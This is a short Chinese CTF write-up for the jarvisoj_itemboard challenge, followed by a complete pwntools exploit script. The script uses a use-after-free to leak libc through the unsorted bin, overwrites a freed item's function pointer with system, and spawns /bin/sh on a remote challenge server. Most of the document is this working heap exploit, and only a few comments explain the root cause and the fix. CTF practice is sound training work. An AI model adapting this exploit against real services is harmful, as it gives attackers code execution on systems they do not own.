jarvisoj_itemboard
查看保护
简单题目
uaf漏洞
攻击思路:利用unsortedbin直接泄露出libc。劫持堆里面的指针为system,下一次delete的时候就可以system("/bin/sh");笔者就不多写了,比较简单,uaf手法可以看z1r0's blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'

# ANSI colour prefixes used by the two log helpers below.
_ORANGE = '\x1b[01;38;5;214m'
_RED = '\x1b[01;38;5;1m'
_RESET = '\x1b[0m'


def li(x):
    """Print the string *x* highlighted in orange (used for leaked values)."""
    print(_ORANGE + x + _RESET)


def ll(x):
    """Print the string *x* highlighted in red."""
    print(_RED + x + _RESET)


# Non-zero selects the remote instance; zero runs the local binary instead.
debug = 1
r = remote('node4.buuoj.cn', 27746) if debug else process(file_name)
elf = ELF(file_name)
def dbg():
    """Attach GDB to the live tube `r` for interactive inspection."""
    target = r
    gdb.attach(target)
def add(name, length, desc):
    """Drive menu option 1: create an item.

    Answers the program's four prompts in order: the menu choice, the item
    name, the requested description length (sent as decimal text) and the
    description contents.
    """
    answers = (
        ("choose:", "1"),
        ("Item name?\n", name),
        ("Description's len?\n", str(length)),
        ("Description?\n", desc),
    )
    for prompt, reply in answers:
        r.sendlineafter(prompt, reply)
def show(idx):
    """Drive menu option 3: print the item stored at index *idx*."""
    choice, which = "3", str(idx)
    r.sendlineafter("choose:", choice)
    r.sendlineafter("Which item?\n", which)
def delete(idx):
    """Drive menu option 4: free the item stored at index *idx*.

    Per the writeup, the program does not invalidate the entry after freeing
    it, which is the use-after-free the script relies on.
    """
    for prompt, reply in (("choose:", "4"), ("Which item?\n", str(idx))):
        r.sendlineafter(prompt, reply)
# Root cause (defender's view): delete() frees an item but the program evidently
# keeps the stale table entry, so show()/delete() on that index still operate on
# freed memory. Clearing the entry on free and rejecting indices that are not
# live would close both the information leak and the pointer hijack below.

# Step 1: leak a libc address through the freed item.
# Item 0's 0x80-byte description is presumably sized so its freed chunk lands in
# the unsorted bin (the leak source named in the writeup) rather than a fastbin;
# item 1 is a small separator allocation. TODO confirm against the binary.
add('aaaa', 0x80, 'bbbb')
add('dddd', 0x20, 'dddd')
delete(0)
# show() on the freed index prints the freed chunk's contents (the UAF).
show(0)
# Take the 6 bytes ending in 0x7f as a little-endian pointer. The author's
# constant (-88 - 0x10) rebases the leaked arena pointer to __malloc_hook;
# NOTE(review): that offset is specific to the libc build named below
# (libc-2.23.so) — confirm it if the printed value looks wrong.
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
# The challenge's libc; loaded here (after the leak) simply because the author
# placed it here — it does not depend on the network exchange above.
libc = ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']

# Step 2: repurpose the stale item-0 entry, as outlined in the writeup.
delete(1)
# A 24-byte description whose content is the command string followed by
# system's address; per the writeup this overwrites the heap pointer that item
# 0's delete path later calls. The exact layout (why 24 bytes, why the 8-byte
# 'aaaaaaaa' padding) is not shown on this page — verify in a debugger.
add('a' * 16, 24, b'/bin/sh;aaaaaaaa' + p64(system_addr))
# Deleting the stale entry invokes the replaced pointer, i.e. system("/bin/sh;...").
delete(0)
r.interactive()